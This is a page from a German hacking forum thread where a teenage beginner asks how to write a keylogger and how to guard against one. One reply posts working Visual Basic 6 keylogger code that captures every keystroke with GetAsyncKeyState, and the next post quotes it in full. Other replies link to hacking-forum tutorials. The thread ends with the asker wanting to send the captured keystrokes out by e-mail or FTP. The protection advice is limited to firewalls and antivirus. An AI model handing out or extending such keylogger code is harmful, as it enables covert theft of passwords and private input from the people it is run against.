Seite 2 von 6 ErsteErste 1234 ... LetzteLetzte
Ergebnis 11 bis 20 von 53
  1. #11
    W32.Lovgate
    Registriert seit
    04.11.2007
    Beiträge
    365

    Standard

    ich bin grundlegend eurer meinung,
    aber es reicht nun mit dem gespamme

    ihr könnt über pm miteinander über noobs
    lästern.

  2. #12
    Fortgeschrittener
    Registriert seit
    31.08.2008
    Beiträge
    38

    Standard

    boor ey euch ist es ja auch nicht recht das ein anfangs programmierer versucht zu lehrnen wie mann keyloger macht ich kene mich mit vb6 schon so gut aus das ich mein paar kleine programme gemacht habe also kenne ich auch schon mittleweile die programmierungs spachen und sry für meine rechtschreibung ich bin aber legasteniker kann nix dagegen machen !
    Ja einer könnte mir ja mahl sagen wie ein keyloger so aufgebaut ist oder so und wie mann sich vor keyloger schützt ?

  3. #13
    Fortgeschrittener
    Registriert seit
    13.07.2008
    Beiträge
    40

    Standard

    Junge du willst Programmieren können aber kannst keine Rechtschreibung?
    Codeschnipsel Kopieren ist kein Programmieren -_-'

    Vor Viren(inkl. Keylogger, Trojaner) schützen, Firewall, Antivirus.

  4. #14
    W32.Lovgate
    Registriert seit
    04.11.2007
    Beiträge
    365

    Standard

    Zitat Zitat von ozistyle
    boor ey euch ist es ja auch nicht recht das ein anfangs programmierer versucht zu lehrnen wie mann keyloger macht ich kene mich mit vb6 schon so gut aus das ich mein paar kleine programme gemacht habe also kenne ich auch schon mittleweile die programmierungs spachen und sry für meine rechtschreibung ich bin aber legasteniker kann nix dagegen machen !
    Ja einer könnte mir ja mahl sagen wie ein keyloger so aufgebaut ist oder so und wie mann sich vor keyloger schützt ?
    junge o.O, so viel rechtschreibfehler auf einem haufen hab ich seit meiner zeit in der grundschule nicht mehr gesehn.
    außerdem ein legasteniker kann nicht lesen und schreib, du schon. denk ich.

    ein keylogger speichert die tastenschläge auf o.O

    hier hast du mal was zu spielen:

    Code:
    Dim result As Integer
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
    
    Private Sub Form_Load()
    Timer1.Interval = 1
    End Sub
    Private Sub Timer1_Timer()
    
    For i = 1 To 255
    result = 0
    result = GetAsyncKeyState(i)
    
    If result = -32767 Then
    Text1.Text = Text1.Text + Chr(i)
    End If
    Next i
    End Sub

  5. #15
    Fortgeschrittener
    Registriert seit
    31.08.2008
    Beiträge
    38

    Standard

    Zitat Zitat von staebche
    Zitat Zitat von ozistyle
    boor ey euch ist es ja auch nicht recht das ein anfangs programmierer versucht zu lehrnen wie mann keyloger macht ich kene mich mit vb6 schon so gut aus das ich mein paar kleine programme gemacht habe also kenne ich auch schon mittleweile die programmierungs spachen und sry für meine rechtschreibung ich bin aber legasteniker kann nix dagegen machen !
    Ja einer könnte mir ja mahl sagen wie ein keyloger so aufgebaut ist oder so und wie mann sich vor keyloger schützt ?
    junge o.O, so viel rechtschreibfehler auf einem haufen hab ich seit meiner zeit in der grundschule nicht mehr gesehn.
    außerdem ein legasteniker kann nicht lesen und schreib, du schon. denk ich.

    ein keylogger speichert die tastenschläge auf o.O

    hier hast du mal was zu spielen:

    Code:
    Dim result As Integer
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
    
    Private Sub Form_Load()
    Timer1.Interval = 1
    End Sub
    Private Sub Timer1_Timer()
    
    For i = 1 To 255
    result = 0
    result = GetAsyncKeyState(i)
    
    If result = -32767 Then
    Text1.Text = Text1.Text + Chr(i)
    End If
    Next i
    End Sub
    Ich bin ein 15 Jähriger Legasteniker und kein 1 jähriger ok mit 15 jahren müsste mann schon lessen können und schreiben ist halt die schwere sache und jetzt hört auf über meine schreibtfehler zu sprechen und antwortet mir mahl richtig ( Wie kann ich keyloger enfernen undm ich dafor schützen ) ?

  6. #16
    CIH-Virus
    Registriert seit
    18.11.2007
    Beiträge
    452

    Standard

    Ein Keylogger ist so aufgebaut: Es zeichnet auf, was der User an seiner Tastatur eingibt und speichert diese Informationen ab. Entweder werden diese Informationen in einer Datei gespeichert oder zusätzlich auf einen FTP geladen oder per E-Mail versandt.

    Sorry falls ich mich irre aber: Soweit ich weiß brauchen Legastheniker nur länger um einen fehlerlosen Text zu schreiben, oder?
    Wenn es so ist, solltest du dir einfach mehr Zeit für deine Beiträge nehmen


    Edit: OK ich glaube ich hab F5 vergessen^^
    Ähm schützen kannst du dich, wie dir bereits gesagt wurde mit Antiviren und Firewalls (letzteres, falls die Keylogger uploaden)

  7. #17
    Fortgeschrittener
    Registriert seit
    31.08.2008
    Beiträge
    38

    Standard

    Zitat Zitat von Tomo
    Ein Keylogger ist so aufgebaut: Es zeichnet auf, was der User an seiner Tastatur eingibt und speichert diese Informationen ab. Entweder werden diese Informationen in einer Datei gespeichert oder zusätzlich auf einen FTP geladen oder per E-Mail versandt.

    Sorry falls ich mich irre aber: Soweit ich weiß brauchen Legastheniker nur länger um einen fehlerlosen Text zu schreiben, oder?
    Wenn es so ist, solltest du dir einfach mehr Zeit für deine Beiträge nehmen
    Ich gehe in ein kurs für Legasteniker und hab es geschaft jetzt fliessend zu lessen und ich hoffe das ich auch bald fliessend schreiben kann dake für info
    und mitlerweile habe ich die sufu genutzt aber sory da war kein tut also glaub ich das es hier kein tut dafür gibt !

  8. #18
    Fortgeschrittener
    Registriert seit
    13.07.2008
    Beiträge
    40

    Standard

    Das man einem alles in den Mund stecken muss
    Und auchnoch vorkauen

    http://free-hack.com/viewtopic.php?t=58700
    http://free-hack.com/viewtopic.php?t=58389

  9. #19
    CIH-Virus
    Registriert seit
    18.11.2007
    Beiträge
    452

    Standard

    Vielleicht hilft das: http://www.c-plusplus.de/forum/viewt...-is-39145.html
    Ich weiß ja nicht mit welchem Compiler du arbeitest, das ist glaub ich kein natives C++ (habe es mir nicht genau angeschaut, aber es ist im Borland C++ Forum gewesen^^)

  10. #20
    Fortgeschrittener
    Registriert seit
    31.08.2008
    Beiträge
    38

    Standard

    ja dann hab ich noch ne frage welches prog ist am besten ?
    Microsoft C++ Compiler oder welches ?
    ( ich hab mahl nach den prog gesucht aber erfolglos wollen alle gold haben ind google )
    Und ich hab vorhin eine seite bekommen :
    http://www.c-plusplus.de/forum/viewt...-is-39145.html
    ( was meint der mit DDL Experten und noch ne frage wie binde ich das mit in meine e-mail oder in mein FTP ?)

Seite 2 von 6 ErsteErste 1234 ... LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •